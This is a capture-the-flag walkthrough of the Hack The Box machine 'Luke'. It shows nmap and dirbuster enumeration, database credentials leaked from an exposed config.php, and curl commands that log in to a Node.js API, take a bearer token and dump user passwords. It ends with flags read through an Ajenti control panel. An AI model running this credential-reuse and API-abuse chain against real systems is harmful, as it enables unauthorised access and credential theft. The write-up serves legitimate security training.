Hack The Box Write Up - Luke
Hacker Orientation
Box number three for me! I was itching to get another shell.
OS: FreeBSD
Difficulty: Medium
Points: 30
Release: 25 May 2019
IP: 10.10.10.137
nmap:
# Nmap 7.70 scan initiated Tue Aug 27 18:14:27 2019 as: nmap -sV -o nmap_sv.out 10.10.10.137
Nmap scan report for 10.10.10.137
Host is up (0.069s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3+ (ext.1)
22/tcp open ssh?
80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
3000/tcp open http Node.js Express framework
8000/tcp open http Ajenti http control panel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 27 18:16:47 2019 -- 1 IP address (1 host up) scanned in 140.70 seconds
Breaking it down
FTP is kind of interesting, but 80, 3000, and 8000 are all commonly used for HTTP 🤔
Enumerate
This sounds like a job for dirbuster! I ran it against 80, 3000, and 8000, then proceeded to poke around all of those pages to get acquainted with the entire environment.
Throughout the poking of dirbuster output, I found a page that had a DB password: http://10.10.10.137/config.php
$dbHost = 'localhost'; $dbUsername = 'root'; $dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login"; $conn = new mysqli($dbHost, $dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);
Down the rabbit hole we go
I can’t tell you how many places I tried to use that credential. Or tried cracking it 😅
After many hours of running into a wall, I found that you needed to use that credential with the ‘admin’ user on port 3000/login.
curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/Login
This returned a token, that we then use to browse the rest of the output from dirbuster.
Use that token to look at /users
curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY2OTYyMjQyLCJleHAiOjE1NjcwNDg2NDJ9.CydKxM9wI-Kb11P2-2dVvCQj2U6YKO6zmBZK8pBX3ps" http://10.10.10.137:3000/users
[
{"ID":"1","name":"Admin","Role":"Superuser"},
{"ID":"2","name":"Derry","Role":"Web Admin"},
{"ID":"3","name":"Yuri","Role":"Beta Tester"},
{"ID":"4","name":"Dory","Role":"Supporter"}
]
Then again for each user (/users/$user)
curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY2OTYyMjQyLCJleHAiOjE1NjcwNDg2NDJ9.CydKxM9wI-Kb11P2-2dVvCQj2U6YKO6zmBZK8pBX3ps" http://10.10.10.137:3000/users/admin
[
{"name":"Admin","password":"WX5b7)>/rp$U)FW"},
{"name":"Derry","password":"rZ86wwLvx7jUxtch"},
{"name":"Dory","password":"5y:!xa=ybfe)/QD"},
{"name":"Yuri","password":"bet@tester87"},
]
Down ALL of the other rabbit holes
Better use the creds across every login portal I saw from dirbuster!
Upper case, lower case, all caps. Even tried all 4 of the passwords for each user.
Light at the end of the tunnel
Eventually, I successfully auth’d to /management with Derry, then looked at /management/config.json
password "KpMasng6S5EtTy9Z"
Login to 8000 and use the terminal within the CMS to view /home/derry/user.txt and /root/root.txt.
Before concluding this writeup, what snags did I run into?
SO MANY RABBIT HOLES. But that’s not necessarily a bad thing. I had to be persistent (and try harder) to get through this one.
Closing thoughts
Flags were a little underwhelming once you got to the CMS, but this was a great exercise in enumeration and a test of will.
H4d3s, you made me question my sanity. 🙃